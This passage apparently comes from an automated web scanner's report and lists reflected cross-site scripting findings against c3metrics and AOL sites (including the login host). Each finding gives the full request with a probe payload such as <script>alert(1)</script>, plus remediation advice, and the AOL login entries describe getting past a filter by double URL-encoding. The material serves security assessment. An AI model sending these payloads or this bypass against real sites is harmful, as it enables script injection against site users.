GET /v.js?id=adver7e328<script>alert(1)</script>7a09c59ed8f&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:15 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Content-Type: text/html
Set-Cookie: SERVERID=s15; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver7e328<script>alert(1)</script>7a09c59ed8f&cid=480&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;
...[SNIP]...

5.9. http://480-adver-view.c3metrics.com/v.js [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload f789d<script>alert(1)</script>2df104e1cea was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480&t=72f789d<script>alert(1)</script>2df104e1cea HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:37 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s2; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480&t=72f789d<script>alert(1)</script>2df104e1cea&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=new Reg
...[SNIP]...

5.10. http://about.aol.com/aolnetwork/aol_pp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/aol_pp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d43fe"%3bbb310a036eb was submitted in the REST URL parameter 1. This input was echoed as d43fe";bb310a036eb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetworkd43fe"%3bbb310a036eb/aol_pp HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617329219-Repeat%7C1367689329219%3B%20s_nrgvo%3DRepeat%7C1367689329221%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 12:41:22 GMT
Server: AOLserver/4.0.10
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Content-Type: text/html
ntCoent-Length: 10535
set-cookie: dcisid=2899132428.408601165.4098949120; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Content-Length: 10535


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm64 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm64.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetworkd43fe";bb310a036eb";
s_265.prop2="aol_pp";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

5.11. http://about.aol.com/aolnetwork/aol_pp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/aol_pp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f70b"%3b4d061b326ea was submitted in the REST URL parameter 2. This input was echoed as 6f70b";4d061b326ea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetwork/6f70b"%3b4d061b326ea HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617329219-Repeat%7C1367689329219%3B%20s_nrgvo%3DRepeat%7C1367689329221%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 12:41:38 GMT
Server: AOLserver/4.0.10
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Content-Type: text/html
ntCoent-Length: 10521
set-cookie: dcisid=2899066892.3445211725.257032192; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Content-Length: 10521


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm63 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm63.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetwork";
s_265.prop2="6f70b";4d061b326ea";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

5.12. http://about.aol.com/aolnetwork/aolcom_terms [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/aolcom_terms

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90851"%3b5cfb0851bbb was submitted in the REST URL parameter 1. This input was echoed as 90851";5cfb0851bbb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetwork90851"%3b5cfb0851bbb/aolcom_terms HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 12:42:16 GMT
Server: AOLserver/4.0.10
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Content-Type: text/html
ntCoent-Length: 10547
set-cookie: dcisid=3360935356.688962381.1219365888; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Content-Length: 10547


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld64 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-ld64.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetwork90851";5cfb0851bbb";
s_265.prop2="aolcom_terms";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

5.13. http://about.aol.com/aolnetwork/aolcom_terms [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/aolcom_terms

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0463"%3bf8dd5e0d644 was submitted in the REST URL parameter 2. This input was echoed as f0463";f8dd5e0d644 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetwork/f0463"%3bf8dd5e0d644 HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 12:42:20 GMT
Server: AOLserver/4.0.10
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Content-Type: text/html
ntCoent-Length: 10521
set-cookie: dcisid=2898935820.660193869.2622619648; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Content-Length: 10521


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm61 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm61.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetwork";
s_265.prop2="f0463";f8dd5e0d644";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

5.14. http://about.aol.com/aolnetwork/copyright_infringement [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/copyright_infringement

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46a8e"%3b36d39e4ac68 was submitted in the REST URL parameter 1. This input was echoed as 46a8e";36d39e4ac68 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetwork46a8e"%3b36d39e4ac68/copyright_infringement HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617329219-Repeat%7C1367689329219%3B%20s_nrgvo%3DRepeat%7C1367689329221%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 12:41:24 GMT
Server: AOLserver/4.0.10
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Content-Type: text/html
ntCoent-Length: 10567
set-cookie: dcisid=2899132428.408601165.4199612416; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Content-Length: 10567


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm64 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm64.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetwork46a8e";36d39e4ac68";
s_265.prop2="copyright_infringement";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

5.15. http://about.aol.com/aolnetwork/copyright_infringement [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/copyright_infringement

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9271e"%3be315bc2c006 was submitted in the REST URL parameter 2. This input was echoed as 9271e";e315bc2c006 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetwork/9271e"%3be315bc2c006 HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617329219-Repeat%7C1367689329219%3B%20s_nrgvo%3DRepeat%7C1367689329221%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 12:42:23 GMT
Server: AOLserver/4.0.10
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Content-Type: text/html
ntCoent-Length: 10521
set-cookie: dcisid=3361000892.722516813.2628455424; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Content-Length: 10521


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld65 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-ld65.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetwork";
s_265.prop2="9271e";e315bc2c006";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

5.16. https://account.login.aol.com/_cqr/opr/opr.psp [authLev parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://account.login.aol.com
Path:   /_cqr/opr/opr.psp

Issue detail

The value of the authLev request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bfe9%2522%253b0e2921fad4a was submitted in the authLev parameter. This input was echoed as 7bfe9";0e2921fad4a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the authLev request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /_cqr/opr/opr.psp?sitedomain=bill.aol.com&authLev=S7bfe9%2522%253b0e2921fad4a&siteState=OrigUrl%3Dhttps%253A%252F%252Fbill.aol.com%252FSPortal%252Fjsp%252Fmain.jsp&lang=en&locale=us HTTP/1.1
Host: account.login.aol.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617350589-Repeat%7C1367689350589%3B%20s_nrgvo%3DRepeat%7C1367689350591%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:43:36 GMT
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: OPR_SC=diAxLjAga2lkIDAgUWtnaFZheXBieUMzVFM2TUwrK29JaTIzd1pRPQ%3D%3D-NcFbxVvZ3cH4d3%2Bx%2BogHkrjcziFFwz%2Bb; Domain=account.login.aol.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Length: 2894



...[SNIP]...
fxID="sso";
s_265.pageName="sso : badbrowser";
s_265.channel="us.snssignin";
s_265.prop1='ssologin';
s_265.prop12="/opr/badbrowser.jsp";
s_265.prop15="bm9uZQ%3D%3D";
s_265.prop17="std";
s_265.prop18="S7bfe9";0e2921fad4a";
s_265.prop19="vl6";
s_265.prop20="en-us";
var s_code=s_265.t();
if(s_code)document.write(s_code);
//-->
...[SNIP]...

5.17. https://account.login.aol.com/opr/_cqr/opr/opr.psp [authLev parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://account.login.aol.com
Path:   /opr/_cqr/opr/opr.psp

Issue detail

The value of the authLev request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4481%2522%253bea66b28391e was submitted in the authLev parameter. This input was echoed as f4481";ea66b28391e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the authLev request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /opr/_cqr/opr/opr.psp?sitedomain=bill.aol.com&authLev=Sf4481%2522%253bea66b28391e&siteState=OrigUrl%3Dhttps%253A%252F%252Fbill.aol.com%252FSPortal%252Fjsp%252Fmain.jsp&lang=en&locale=us HTTP/1.1
Host: account.login.aol.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:44:15 GMT
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: OPR_SC=diAxLjAga2lkIDAgUWtnaFZheXBieUMzVFM2TUwrK29JaTIzd1pRPQ%3D%3D-NcFbxVvZ3cH4d3%2Bx%2BogHkrjcziFFwz%2Bb; Domain=account.login.aol.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Length: 2894



...[SNIP]...
fxID="sso";
s_265.pageName="sso : badbrowser";
s_265.channel="us.snssignin";
s_265.prop1='ssologin';
s_265.prop12="/opr/badbrowser.jsp";
s_265.prop15="bm9uZQ%3D%3D";
s_265.prop17="std";
s_265.prop18="Sf4481";ea66b28391e";
s_265.prop19="vl6";
s_265.prop20="en-us";
var s_code=s_265.t();
if(s_code)document.write(s_code);
//-->
...[SNIP]...

5.18. http://ad.doubleclick.net/adj/huffpost.premium/front [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/huffpost.premium/front

Issue detail

